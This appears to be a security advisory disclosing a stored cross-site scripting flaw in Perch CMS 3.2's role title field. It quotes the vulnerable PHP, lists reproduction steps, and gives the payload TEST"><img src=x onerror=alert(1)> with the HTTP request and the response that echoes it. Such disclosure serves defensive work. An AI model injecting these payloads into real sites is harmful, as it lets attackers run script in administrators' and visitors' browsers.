Perch CMS version 3.2 suffers from a persistent cross site scripting vulnerability.
# Exploit Title:
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Version: 3.2
# Tested on: Windows Server 2022
# Blog: http://msecureltd.blogspot.com
XSS #1:
File: roles.edit.post.php
Line #57:
[...]
<div class="field-wrap <?php echo $Form->error('roleTitle', false);?>">
<?php echo $Form->label('roleTitle', 'Title'); ?>
<div class="form-entry">
<?php echo $Form->text('roleTitle', $Form->get($details,
'roleTitle')); ?>
</div>
</div>
[...]
Steps to Reproduce:
1. Login to application
2. Go to Roles
3. Select Title
4. Enter payload TEST"><img src=x onerror=alert(1)>
// HTTP POST request
POST /perch/perch/core/users/roles/edit/?id=1 HTTP/1.1
Host: 192.168.1.11
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/114.0
[...]
roleTitle=TEST%22%3e%3cimg+src%3dx+onerror%3dalert%281%29%3e&privs-perch%5b%5d=1&btnsubmit=Save+changes&formaction=core&token=0389a6698f1911a162fdb71328dd2af0
// HTTP response
HTTP/1.1 200 OK
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
[...]
[...]
<a href="/perch/perch/core/users/roles/edit/?id=1">TEST"><img src=x
onerror=alert(1)></a>
[...]
